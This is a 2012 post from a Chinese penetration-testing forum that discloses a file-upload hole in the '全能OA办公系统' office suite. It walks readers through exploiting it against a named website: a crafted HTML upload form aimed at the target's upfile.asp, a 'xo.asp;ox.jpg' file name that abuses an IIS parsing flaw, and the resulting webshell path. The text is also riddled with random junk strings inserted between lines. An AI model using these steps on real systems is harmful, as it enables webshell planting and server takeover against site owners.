中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
" O2 B4 T- j- v" }6 u/ U2 U% g( H# {" W- w
系统介绍:1 Z9 i) ~  G% O

- r6 y+ p; ^: p$ H$ K/ H全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
" o* c2 R$ J8 t$ `7 F) l9 P% k/ `& e* B
主要功能:
- x" \: C1 }, D$ \1 n' X( N+ }公司通告
1 G3 b4 c! _9 q. R& p工作计划
& `, d( @9 U1 K通讯助理
5 a1 _4 X$ d2 n% W. Y客户资源 1 m! i8 _7 U$ U$ }$ l' O: V
我的公文
; I7 n: G0 r( K) z" {! M, l( g$ `公文传阅 % q7 e! B( H+ L! j
公共资源 $ w% A  S) n/ m/ z* G
资源预约 4 E7 j* c3 O+ D! ?$ H6 [
今日考勤 , n$ v# Y. Y% @5 f
个人计划
  {  ^/ `/ N- W  Z/ M" m个人通讯录 * O" g2 U, ]" X6 O' ^8 q7 O5 ]5 G( F
个人基本档案 # s/ q+ e9 B2 J
未读邮件
4 m5 t! w- G9 q8 }8 H发邮件
: z# B# Z" N" w- K收件夹 $ E2 ^8 e1 y) L
寄件夹
5 L0 C3 G0 ]' _$ k网络硬盘 . H$ t. v2 V5 c3 d- G
网络会议 9 F- d. G  w+ n0 z
网络调查 2 ?2 x7 h, U- n1 j
交流论坛6 g$ m0 l* h. y% N+ n3 \: l0 [

- z( u' G/ U! d: ]* z- Q5 i有兴趣测试的朋友可以下源码看看
. R3 P* A+ c6 z8 R; A6 N! j
7 Z; B& ~+ w# W* e+ J: K- p源码下载:
9 s( Q8 L- M, X: m4 ]& C- a% p0 f7 d9 y, T/ ?0 q- w' W
http://www.mycodes.net/30/4750.htm
0 L4 O- h* F' E9 Q* W: U9 Q; ^+ ~( X0 m8 ^& M2 v3 E9 J
漏洞介绍:0 }& v4 `5 @4 g/ N+ y7 U

, h7 y3 l7 l9 W2 Q由upfile.asp上传文件漏洞引起5 T2 K1 G; r/ ~

* s& n# }8 Y: Z  h测试方法:: F. {2 S7 e1 W2 N! k0 u: H! N' `2 `

. Y3 {5 Q3 v& ?- S/ H使用名小子上传http://www.itlynn.com/upfile.asp即可
" r5 Q4 {6 K! M( O' f# i
+ k4 ~- Z' L/ ~8 {  o: ~如果upfile.asp文件被删除不存在。3 D6 W& `& A% k

  t5 I( c* L4 d4 B  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
% @- M3 {' g4 t, P
& G  R& v( n0 G5 |# q" ?如果存在那么将如下代码保存为upfile.html。
6 G* I' C  [2 ~6 R0 u* i; p) H9 z) q. w4 M
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
, \+ o. k1 k, ~: x& ]6 \1 n1 T; g( F2 ?& T; q" [
9 b4 H; h/ C& Y  K! M, r: l* U
' U( y  u6 `. u
01 <table border='0' align="center" cellpadding="5">
7 h$ ~8 P8 ?6 q8 d0 s2 K7 B7 R- S! N9 X! i( o4 f7 I# U. V
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
  q7 }+ e; L" m; \' j+ D; ]3 E
03 <tr>
! P$ }: U5 t" A" q4 c+ _0 X1 u. C/ D# i$ I, H: W, C7 x! y, Z3 H
04             <td>报错:</td>
7 s6 O1 k' p4 G2 {9 g9 Y( R. M7 b/ j6 r# }
05             <td><input type='radio' name='errnumber' value='0'>
# a% }$ s8 L! W. f" p* p" I( R/ ^3 t) o7 d
06               自动更名
  y( d6 F, C* i' y) ~
9 B+ K( C( j4 Z" q5 |, @6 d' C07               <input type='radio' name='errnumber' value='1' checked>
: [1 {% \* Q3 C' O7 ^: \+ H3 j: }& D  ]* t2 L
08               报错方式
6 U5 N2 T; T3 t& W) O) _4 q. G# X5 [9 F9 O4 g
09               <input type='radio' name='errnumber' value='2'> ; M- R0 @# ^* r' E3 ^# `

  h  P! K  T% B+ x9 K; g10               直接覆盖</td> 7 Q$ d. ]  Q4 {

4 e  u; S0 g( p& N4 O11           </tr>
  f/ `- ~( Y7 K" Z; {7 v6 a2 n, l3 k4 r* Y6 L- A
12           <tr>
* ~0 o& k0 ?* _# g: X+ L
7 E+ Q7 ?$ X0 A4 v2 Y6 V13             <td>主题:</td> # x! _1 \8 M7 F( G
( q" y6 m8 e' V5 q" G3 V
14             <td><input type='text' name='filename' size='30'></td> 5 x7 F0 [! X+ v) Z% N+ W: E
0 C7 g; d  G/ Q7 v$ _6 M; ^. M% ^# T
15           </tr>
6 @- n: H  G' |2 S  T0 T0 M& ]. c& u
16           <tr> 5 b! x$ S+ y( r  V- E
( H; x0 b% D! s& {
17             <td>文件:</td> * ~- y+ k  y9 {2 w$ P
! {; Z0 z6 H2 x$ h% F
18             <td><input type="file"name="fruit"size="30"></td>
  o6 y$ U" w# c7 x( D* Q, i
9 k2 `3 Z$ K6 Q19           </tr> ! m$ Y$ ]; R" H. ~
: m. v! E0 T: a; d5 A
20           <tr>
; d& z1 l5 L7 T" Q
7 v! J' p* p* P0 h4 D( k* x* W+ n: m21             <td valign='top'>简介:</td>
+ f* g) c+ }) ^9 f+ g9 M( H* v' I) }7 W" K2 o( O; z  G7 G% R
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
6 J6 b/ A! F  l+ L8 z8 o/ w  L# x' H+ C5 g- Y; S5 F1 }
23           </tr>
. Q$ L/ Q) q( p4 t
4 C3 m6 T$ \' G+ D- B0 o5 T1 B" \24   
0 t" I  x, p0 _2 h9 i. `5 s( ~
2 w/ s9 l* H, B9 p& z0 h7 x& w25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 3 m' l1 k$ G# v, X/ P0 x
: s, j) g7 v  G( M) p
26           </tr>
& H) v6 ]9 g7 p# C+ ?) o* g( j1 k& Z, j
27         </form>
% d9 V$ K+ x! L% X1 d  p4 O2 w
6 y1 F9 O1 k6 H" `6 Z$ T6 _6 i/ q8 u然后打开上传一个文件名为xo.asp;ox.jpg的文件。
& M7 ]1 y, W- Y/ l2 ^
) ]0 r6 t. X0 x9 q7 P: p4 v( Z: |% H 0 b6 C% e" Q9 F" x$ z( g+ ]0 g
/ `* d' C3 }0 {8 r
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg6 W6 u- |' h1 Y9 Z5 b8 u% ?, M! N

& g; U/ ~) c* v- m此漏洞需要配合解析漏洞利用。. F4 b3 Z: ~: g: F) X
, {& z3 ~: v# e





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2